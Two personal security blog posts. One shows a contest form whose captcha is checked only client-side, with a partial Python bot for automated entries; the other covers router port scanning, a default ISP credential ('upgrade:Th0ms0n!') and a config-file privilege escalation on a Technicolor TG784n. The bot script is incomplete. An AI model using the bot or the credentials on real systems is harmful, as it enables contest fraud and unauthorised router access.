Client-side anti-bot mechanism #exerciseinfutility

Hello paranoids

Today, i bring a laughable case of input verification and anti-bot measures. Let us get straight to the point, shall we?

When checking an online contest , i stumbled across this (the form is from a Portuguese website and was on Portuguese as well):

Context form

Contest form

BI is an 8-digits string representing unequivocally a citizen (citizen ID of sorts). I marked the “8+9” operation with the mouse. I am pretty sure you can tell what is coming next:

80's captcha

80’s captcha

At first, this seemed like a pretty old school captcha. This raises two questions:

  1. Is the validation client-side?
  2. Is the value hardcoded on the served page?

Well, a hardcoded should mean a server-side verification but we never know. Once i digged on the source scripts, i found this:


Client-side verification scripts.

For those wondering which are the required fields, they are: name, email, BI, phone and place. As you can see only email and “hipster captcha” are checked. The others are checked for emptiness at most. Other fields sent are hidden and easily retrievable with a basic script. As for cookies, you get an ASP.NET_SessionId through the Set-Cookie header and other cookies which i assume to be related to statistics (e.g. __gads).

Now, the saddest part here for both attackers and for application owners is that the form seems to succeed always: with or without cookies, with or without mail. To make things worse, the end-user gets no confirmation email which means i cannot tell if my participation was accepted or nor (if my attack succeeded or not). I may be wrong but i assume once the form is submitted, any errors from the database are ignored and the end-user receives an accepted response. The other explanation is that the database fields are all strings and thus, there is no type checking (AHH HELL NA!). Still, all this data suffices to create an automated script. In order to make an automated tool more user-alike, i will retrieve the session cookie.

This python script should do the trick:

import http.client as httpc
import urllib.parse as urlparse

host = 'cannot_tell_you_the_host'
headers={'Host':'host,'User-Agent':'Mozilla/5.0 (X11; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Connection':'keep-alive'}

#Form fields - should use DOM but i am lazy
subject=urlparse.quote_plus('Bilhetes O último caçador de bruxas')
name=urlparse.quote_plus('John doe')
place=urlparse.quote_plus('Cinemas NOS COLOMBO (Lisboa)')
place_question=urlparse.quote_plus('Onde queres ver o filme?')

bot_warmup_connection = httpc.HTTPConnection(host,80)

first_get_response = bot_warmup_connection.getresponse()



headers['Cookie'] = first_get_response.getheader('Set-Cookie').split(';')[0]


bot_submit_connection = httpc.HTTPConnection(host,80)
submit_response = bot_submit_connection.getresponse()
response_body =

if submit_response.status == 200:

This script suffers from some issues and limitations since the website does not give appropriate feedback on the success of the submission (e.g. mail, http error code,server side response), leaving the bot and even a non-malicious user clueless (it is an example of bad security and programming…oh well..). Adding automated generation of BIs and emails and you have enough juice to fill their entire database (or their .txt file, i can’t even tell anymore).

The saddest part there is that i have notified the website owners previously (this is not the first time they use such poor security mechanism) of this page and got no response and no changes. People tend to program oriented to the “just works!/simplicity over security” paradigm leaving security aside until they suffer the consequences of their poor decisions. What i have just presented here is not alarming (it is not a data breach of some sort). Yet, it is enough to fill their databases with garbage, leaving other legitimate contest participants out.

You think you so smart. What would you do?

Well, i am glad you asked. First, the captcha should be an image (it is tough or close to impossible to get characters from a properly made captcha) and second, it should be generated and verified by the server. What is the point in having the client generate and verify something to protect the application from malicious clients? There are plenty of libraries to create captchas for php, asp, etc. Since i do not know which ones are safer, i will not name any (hacked readers are unsatisfied readers :P).

Stay safe 😉

Technicolor TG784n v3 hidden dangers and privilige escalation (made simple)

If you are reading this post: congratulations!, you are reading my first post ever on a blog.

I am pretty sure we share (if you like security) some concerns regarding internet-connected devices in your house, specially those you can’t understand correctly (in my case smartphones and ISP devices). This post regards the latter since, even though i am not familiar with Technicolor routers, i am still familiar with routers. I wanted to answer the question:

What services do my router offer, specially to the outside world?

First, a little:


Some of the things i will say here are not rocket science and you most likely know them but i think it is still important to reiterate because this blog intends to take security solutions and concerns to everyone. The internet device you see on your house, which was put there by your Internet Service Provider (ISP) routes your traffic between your internal devices and, between them and the internet. You may have dozens of internet-connected devices in your house, with different (private) IP addresses but they are all mapped to a single public IP address given by your ISP to identify your network to the world. Such mapping is made using NAT+PAT (Network Address Translation + Port Address Translation). Since you are mapping multiple private addresses to a single public one,  you must distinguish packets from different internal devices based on ports. Network 101 is over! time to get to the interesting parts.

ISP routers offer multiple services to network users (e.g. DNS, FTP, HTTP management page, Telnet for router management). While i knew this before, i was curious to find out more services. These services are typically protected from outside accesses, i.e., only users using private addresses may access them, which makes sense. Yet, the services i wanted to find out more about were the external services, available on the public address of the router (you can have different services on different router addresses by playing with the firewall).

I started with the internal network. Nmap to the rescue:

nmap -p0- -A -T5 -v default_gateway

-p0-: all ports from 0-65535
-A: aggressive/advanced mode which performs OS/services fingerprinting, traceroute
-T5: maximum speed (i am scanning the router in my own house)
-v: show verbose output:
-default_gateway: the router address your devices use to send traffic to networks other than your current (e.g. internet).

Nmap reported six open ports (services):

    • 21(FTP): to store files. Typically used by the media center capabilities of the router.
    • 23(Telnet): to allow router management. If you trust your family you may keep Telnet.
    • 53(DNS): used by your network devices for name resolution.
    • 80(HTTP): user-friendly/limited/buggy administration alternative.
    • 443 (SSL): Reported as remote management.
    • 1723(PPTP): VPN server i suppose.

The only service ringing my paranoid bells is 443 (SSL). Yet, it is seen internally so, i ignored it for the time being. I skipped to the true troublemaker: the external IP. I performed the same Nmap command but this time with my public address (check yours in I also ran Nmap from a public server to rule out firewall restrictions and make the scan more realistic. Nmap reported an open port: 51005 but could not identify clearly what service was there:

CWMP server port open

CWMP server port open

So i tried to connect to that port using the browser and i received this:

HTTP response from 51005

HTTP response from 51005

I don’t know about you but i had to change my pants because this intel made me dirty them. So i searched the port and the router and found out that this service was working as a server for the CWMP – CPE (Customer-premises Equipment) WAN Management Protocol. Being an acronym inside an acronym made me fetch another fresh pair. I am far from being an expert on such remote management protocol but, both words sound suspicious, so i needed to stop that service but i could not find the option on the web interface (work smart not hard). Just out of curiosity i checked other addresses on the range of my operator and noticed that they were running the same service. The passwords are most likely the same for every router and i will dig deeper into that later.

So, i tried to telnet to my router with the same user/password as the one used on the web interface:Administrator:. Yes, the password is blank. Routers default administrator are widely known to be limited (coff…useless…coff coff). The services running on this router can be checked on: service system list (either directly or going through each menu service=>system=>list). As i expected, the service was not shown to me using the Administrator account (couldn’t access the system menu) which led me to search for the root password, debug password, privilege escalation but Google hadn’t the solution. Some people suggested going to the FTP server and get the the user.ini config, modify it and replace it but the Administrator user couldn’t even ls the current directory (WTF?). So, i found out about another user:password, upgrade:Th0ms0n!, which apparently had more privileges. I tried to use it on the Telnet server but it wasn’t enabled but i tried it on the FTP server and managed to get the user.ini:

I searched the user.ini  for Administrator and found this:

Users and roles relations

Users and roles relations

Sorry to blur the hashes. It is not that i don’t trust you but..i don’t. Through the web administration page source, i managed to find what was the hash2 (MD5, really? says my mom). I could not find the meaning of the other fields but the role key is interesting. So i changed the Administrator role to root, uploaded the new file and restarted the router. Once more, i FTPed to the router as Administrator but couldn’t even ls, bro! I checked the user.ini Administrator name and noticed that the role was once more Administrator…weird… I checked once more the files on the main FTP directory and found another interesting file: security.cfg with the following interesting entries prefixed with r (there were more):

Roles definition

Roles definition

Well, i guess i hit the culprit. I assumed the r’s meant roles which makes this some sort of hierarchy (genius!) where the Administrator is a weak/limited role. I also assumed that after the second role “;” there were the capabilities of the roles. SuperUser seems all juiced up since it inherits from root and has lots of any’s, so:

Setting Administrator with the same privileges as SuperUser

 I tried:


in the hope of getting all privileges from root (no specification==default==full power) but i assume i must specify them. After this i could finally access the router services menu and turn off the CWMP service:

Enabled 51005 service

Enabled 51005 service

As you can see, there are two CWMPs(-C and -S or Client and Server respectively). This is because the operator may connect to the router CWMP-S and the router may contact an operator CWMP server to retrieve configurations. The client CWMP concerns me too since i am not sure if the operator may push different configurations leaving me once more out of the cool root group but i will worry about that later.

How do i turn off this service then?

The Technicolor router has (as expected) a similar interface to other more widely used routers (the notion of menus and submenus). “?” lists the available commands, when you type a command and enter you go to the menu of that command and if you want to go back just type “..” (prompt users will find this familiar). To disable the service type: service, then system and then modify. You will be asked for name, state, port, qoslabel, etc. Just put the name “CWMP-S” and “disabled” state.  For the other keep them empty (just press enter until you see a message):

:service system modify name=CWMP-S state=disabled

To finish, just type “saveall” and enter and wait to see the prompt again and you are ready to go! I re-scanned my public IP but the service was no longer available (one less thing to worry about).

Final considerations

This post was meant to address the more paranoid people. To be honest, i had never messed with this router before but after escalating the privileges i will now customize it to my needs (i.e. mess with the firewall and IDS). I am not implying with this post  that you should disable the remote management service, fearing that your ISP may connect to it. I am not even sure of the management capabilities of this service. I am more concerned with the possibility of having a malicious hacker bruteforcing my router or using a leaked password which i am pretty sure is the same as any other router for the same ISP. I did not mention but, you should always keep a backup of the modified files (i keep .save files on the FTP server). I may on next posts analyze the stored passwords to check if i can find the default service password. This post is huge as you may notice but it is my first and i wanted you to get to know my writing style and myself a little better.

Stay safe 😉